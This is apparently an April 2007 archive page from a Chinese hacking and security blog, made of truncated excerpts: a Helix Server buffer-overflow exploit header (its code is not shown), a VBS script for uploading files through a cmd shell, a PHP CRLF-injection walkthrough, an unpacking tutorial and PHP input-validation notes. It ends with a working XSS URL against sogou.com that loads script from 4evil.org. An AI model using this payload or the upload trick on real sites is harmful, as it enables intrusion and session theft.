句句都是你 …
Archive for 四月, 2007
四月 30th, 2007
Helix Server Vsrc3260.dll Remote Vul Exploit
No Comments, 编程开发, by Neeao, 1,672 views./******************************************************************************/Real Networks Helix Universal Server Vsrc3260.dll Remote Buffer Overflow Vulnerability Exploit
by cocoruder(frankruder_at_hotmail.com),2007.04.27http://ruder.cdut.net
References:http://www.securityfocus.com/bid/8476/http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0725
A so old but very interesting vulnerability,Notice that there…
搜索巨头Google日前表示,将剔除那些可能导致恶意代码的搜索结果链接,即使他们已经缴纳了广告费用,以次来保证公司搜索用户的绝对安全。
据CNET报道,目前有些含有恶意代码的网站链接,往往以“赞助连接”的形式被摆放在搜索结果中。
然而一旦用户点击,将自动连接到一个貌似安全的网站,与此同时某些恶意程序却开始运行,例如密码盗窃软件等。据悉,这些恶意广告页面大多通过GoogleAdWords广告服务加盟。
“Google确定了这些二次定位恶意代码网站的链接,并且对其进行删除。”公司代表在周四的博客上表示。实际上,这种自动链接到恶意网页的现象在如今的网络世界十分普遍。据安全公司TrendMicro预测,在未来一年中,被含有恶意代码二次定向的受害网民数量,将完全超越传统的电子邮件诈骗。对于这种现象,各大网络公司和安全提供商也给出了不同的对策,例如Google、火狐浏览器的工具条,以及GoogleDesktop桌面应用程序,McAfee公司的SiteAdvisor等,都可以提供对弹出页面的警报和检测。
Google表示,将在未来版本的AdWords广告服务中,整合而已网页检测功能。“该问题十分严重,我们将持续关注调查,”公司发言人表示,“对于公司的广告系统,我们将保证最终提供安全可靠的解决方案。”
来源: 赛迪网
转载:by zzzevazzz@ph4nt0m.org
一个把任何文件转成批处理的脚本。用Base64编码数据,好处是压缩了大小(相对bin2str而言),缺点是增加处理时间和脚本复杂度。由于效率瓶颈是在bat生成vbs这一步,所以总的来说还是合算了。写文件用ADODB.Recordset,比debug好使多了。大部分事都是脚本做的,批处理只是用echo来生成脚本而已。echo版的好处是,全选复制粘贴到cmd shell里就把文件上传了。
下面是代码。版面限制,排版有点乱:(
程序代码: 引用 'Any2Bat.vbs by zzzEVAzzzon error resume nextset arg=wscript.argumentsif arg.count=0 then wscript.quitwith CreateObject("ADODB.Stream").type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.closeend withif err.number<>0 then wscript.quitset…
作者:lvvl 来源:赛迪网安全社区
在当今中国市场上最主要的加密锁品牌有:
1、美国彩虹公司(也是最早做硬件加密的公司)的国产品牌“加密狗”、美国品牌“圣天诺软件加密锁”;
2、阿拉丁的“HASP”系列加密锁;
3、德国威博公司的“WBU-KEY”加密锁;
4、深思洛克的“深思加密锁”;
5、蓝宇风公司的“金盾加密锁”;
6、飞天公司的“ROCKEY”加密锁等几个主要品牌。
以上加密锁品牌的工作原理都是大同小异:被保护的软件--加密锁之间形成一一对映的关系,被保护的软件在运行的过程当中不断通过其API函数向加密锁发指令来判断加密锁是否存在于,软件离开保护锁不能运行。
但是从其发展历程来看,以美国RAINBOW公司的产品生产研发的历程作一个简单的介绍:
1、从最早由美国RAINBOW公司生产的第一代硬件保护锁,只是通过一个简单查询函数来验证并口的硬件保护锁是否存在,存在则程序继续运行,不再则软件终止运行,来完成并保护软件开发商的利益;
2、接着依然是美国RAINBOW公司对自己的第一代的产品进行了改进而形成了第二代的加密锁产品,并且美国RAINBOW公司为其第二代产品取名为:SENTINEL PRO,其与第一代的产品相比较最大的改变在于加密锁硬件里头的运算芯片由RAINBOW公司写入了一个固定的“加密算法”,但这个算法是单一的固定的。以上两种产品对于软件开发商来说有一个相当大的风险,那就是其必需相信RAINBOW公司不会把买给他们的加密锁买给别的个人,如果RAINBOW把相同的产品出售给别人的话,别人拿到这个加密锁就能使用开发商的软件。
3、通过软件开发商对这个问题的重视,RAINBOW公司针对这种情开发出了第三代的加密产品:SENTINEL SUPERPRO,这种产品彻底解决了软件开发商的后顾之忧。这种产品其运算芯片中内置了28种算法,共分为56个单元,每两个单元可以单独保护一个应用程序,故用RAINBOW公司的说法其一把锁可以保护28个应用程序;且这种加密锁的每个算法单元所采用的算法因子是由软件开发商自己设定的,当其写入加密锁后对于外界来说就相当于一个暗箱,是任何人也读不出来的。
4、但随着解密者的技术的不断提高,RAINBOW中国公司研发出了第四代的产品-智能狗,与现今的差不多所有品牌的加密锁相比较,这种狗有了一个质的飞跃:其通过在开发过程中把一段代码加密后写入加密狗,当程序运行时再把加密狗里的代码在加密狗里自行运行,程序调用其运算结果来完成软件的加密,如此就从理论上杜绝了软件被破解的可能。
现在市面上的加密狗的工作原理不外乎RAINBOW的这两种形式:
1、程序发命令查询--加密狗运算后相应程序;
2、把源代码放入加密狗内部执行(现在还只有RAINBOW公司一家有此功能的加密狗)。
转载:混世魔王's BLOG
PHP 的 fopen(), file() 及其它函数存在一个缺陷,即用户随意地添加额外HTTP报头信息到HTTP请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制,进行非法访问。在某些情况下,这个缺陷甚至可以打开任意的网络连接,在代理端执行PHP脚本和打开邮件转发。
PHP有一些函数用文件名(如:fopen(), file()等)作为它们的参数。如果在php.ini中allow_url_fopen被设置为打开的,这些函数也允许以接受URL来替代接收文件,并且用正确的协议连接到服务器。那么这些函数将很容易遭到 CRLF Injection 攻击。
1)我们开始一个简单的攻击。下面这段PHP代码被保存并取名为snippet.php:
以下内容为程序代码:
<?php
echo '<pre>';
print_r(file("http://www.site1.st/api?sunnan=$sunnan&vind=$vind");
echo '</pre>';
?>
如果攻击者这样发送:…
送给所有爱好黑客的哥哥弟弟姐姐妹妹!
不知道起什么名字好,姑且叫做,溢出你心吧!
溢出你心
…
来源:http://www.chinadforce.com/viewthread.php?tid=77924
下载页面: http://www.hanzify.org/?Go=Show::List&ID=6189 软件大小: 1.3MB 所属分类: 加密解密 上传时间: 2004-08-08 00:44:47 软件汉化: FeiXJ 运行环境: WIN9X/WINME/WINNT/WIN2000PRO/WINXP 软件简介: 这是一个可执行文件的压缩(加壳)工具。
【作者声明】:只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
【调试环境】:WinXP、Ollydbg V1.10、PEiD、LordPE、ImportREC
――――――――――――――――――――――――――――――――― 【脱壳过程】:
看到有兄弟问,所以简单写几句。准备扔西红柿的兄弟可否考虑扔西瓜过来给我?呵呵
用PECompact V2.40汉化版给Win98的记事本加壳,PECompact的压缩效果已经不错了。
设置Ollydbg忽略所有的异常选项。―――――――――――――――――――――――――――――――――一、第一种方法
004010CC B8…
原始出处:http://www.dualface.com/blog信息来源:邪恶八进制信息安全团队(www.eviloctal.com)今天从硬盘里面翻出了一个 PDF: Advanced PHP Security,看了一遍,发现里面讲述的内容非常有价值。因此尝试将主要部分翻译了一下。
其中加入了一些自己的看法和理解,因此和原文有一定差别。
原文本地下载:http://www.dualface.com/blog/downloads/phpworks_security.rar
输入验证必须接受的一个关键概念就是:用户输入总是不可靠、不可信任的!
* 在客户端/服务端之间传输时丢失部分数据* 在处理过程中被破坏* 用户以未预期的方式修改了数据* 有意的攻击,尝试获得未经授权的防火或者搞垮应用程序
这就是为什么用户输入的数据在使用前必须进行验证的根本原因。
访问输入数据在 PHP 中,有一系列的预定义全局变量,提供给开发者访问输入数据的方便途径:
* $_GET – 来自 GET 请求的数据* $_POST – 来自 POST…
转载:H4×0r's Blog
是个好东西.呵呵专门收录存在XSS跨站漏洞的网站希望下次老外在出个存在注入 上传 包含 等系列的web apps漏洞网站收录。
TOP↑http://www.xssed.com/archive/special=1/
这是搜狗的XSS:http://www.sogou.com/sohu?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F4evil.org%2Fs.js%3E%3C%2Fscript%3E